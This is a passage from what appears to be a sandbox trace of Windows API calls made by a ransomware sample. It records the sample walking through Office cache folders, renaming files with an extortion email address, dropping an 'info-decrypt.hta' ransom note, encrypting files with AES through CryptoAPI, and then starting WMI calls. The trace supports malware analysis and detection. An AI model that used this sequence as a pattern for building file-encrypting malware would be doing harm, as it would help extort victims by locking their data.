Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6b [0195.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0195.449] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2dd2c880, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0195.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0195.449] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0195.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0195.450] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0195.450] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0195.451] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fcd0 [0195.452] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.452] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0195.452] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0195.453] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0195.453] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0195.453] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0195.453] FindClose (in: hFindFile=0xb7fcd0 | out: hFindFile=0xb7fcd0) returned 1 [0195.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0195.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0195.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0195.454] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0195.454] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0195.454] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fcd0 [0195.456] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.456] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0195.456] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0195.456] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0195.456] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0195.457] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0195.457] FindClose (in: hFindFile=0xb7fcd0 | out: hFindFile=0xb7fcd0) returned 1 [0195.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0195.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0195.458] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0195.458] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0195.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0195.458] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0195.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0195.459] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0195.459] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0eef8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0195.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f3ec) returned 1 [0195.459] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0 [0195.460] GetFileType (hFile=0x2f0) returned 0x1 [0195.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f3e8) returned 1 [0195.460] GetFileType (hFile=0x2f0) returned 0x1 [0195.460] WriteFile (in: hFile=0x2f0, lpBuffer=0x3b66068*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6c0f4b0, lpOverlapped=0x0 | out: lpBuffer=0x3b66068*, lpNumberOfBytesWritten=0x6c0f4b0*=0x1000, lpOverlapped=0x0) returned 1 [0195.462] WriteFile (in: hFile=0x2f0, lpBuffer=0x3b66068*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6c0f484, lpOverlapped=0x0 | out: lpBuffer=0x3b66068*, lpNumberOfBytesWritten=0x6c0f484*=0x55e, lpOverlapped=0x0) returned 1 [0195.462] CloseHandle (hObject=0x2f0) returned 1 [0195.462] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0195.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0195.462] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), fInfoLevelId=0x0, lpFileInformation=0x3b67084 | out: lpFileInformation=0x3b67084*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00)) returned 1 [0195.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0195.633] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0195.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0195.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0195.633] GetFileType (hFile=0x4e0) returned 0x1 [0195.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0195.633] GetFileType (hFile=0x4e0) returned 0x1 [0195.633] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x265c00 [0195.642] ReadFile (in: hFile=0x4e0, lpBuffer=0x758e0a8, nNumberOfBytesToRead=0x265c00, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x758e0a8*, lpNumberOfBytesRead=0x6c0f4ec*=0x265c00, lpOverlapped=0x0) returned 1 [0195.727] CloseHandle (hObject=0x4e0) returned 1 [0195.728] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0x66bb598) returned 1 [0195.728] CryptGenRandom (in: hProv=0x66bb598, dwLen=0x10, pbBuffer=0x368d384 | out: pbBuffer=0x368d384) returned 1 [0195.920] CryptImportKey (in: hProv=0x66bb598, pbData=0x36686f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f250) returned 1 [0195.920] CryptContextAddRef (hProv=0x66bb598, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.920] CryptContextAddRef (hProv=0x66bb598, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.920] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f4d0) returned 1 [0195.920] CryptContextAddRef (hProv=0x66bb598, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.920] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x36687d8*=0x1, dwFlags=0x0) returned 1 [0195.921] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x36687a4, dwFlags=0x0) returned 1 [0196.149] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7831df0*, pdwDataLen=0x6c0f4b8*=0x265c10, dwBufLen=0x265c10 | out: pbData=0x7831df0*, pdwDataLen=0x6c0f4b8*=0x265c10) returned 1 [0196.210] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3668800*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x3668800*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0196.212] CryptDestroyKey (hKey=0xb7f250) returned 1 [0196.212] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0196.212] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0196.212] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0196.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0196.212] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0196.216] GetFileType (hFile=0x4a8) returned 0x1 [0196.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0196.217] GetFileType (hFile=0x4a8) returned 0x1 [0196.217] WriteFile (in: hFile=0x4a8, lpBuffer=0x3668e40*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x3668e40*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0196.217] CloseHandle (hObject=0x4a8) returned 1 [0196.218] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0196.218] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0196.218] CoTaskMemFree (pv=0xbed438) [0196.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0196.218] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0196.218] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0196.218] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0196.218] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.377] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x60277d0) returned 0x0 [0196.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0196.377] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6030b00) returned 0x0 [0196.377] WbemDefPath:IUnknown:Release (This=0x60277d0) returned 0x0 [0196.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6030b00) returned 0x0 [0196.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0196.377] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0196.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0196.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0196.377] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbe23b0) returned 0x0 [0196.377] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe23b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.377] WbemDefPath:IUnknown:Release (This=0xbe23b0) returned 0x3 [0196.377] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0196.378] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0196.378] 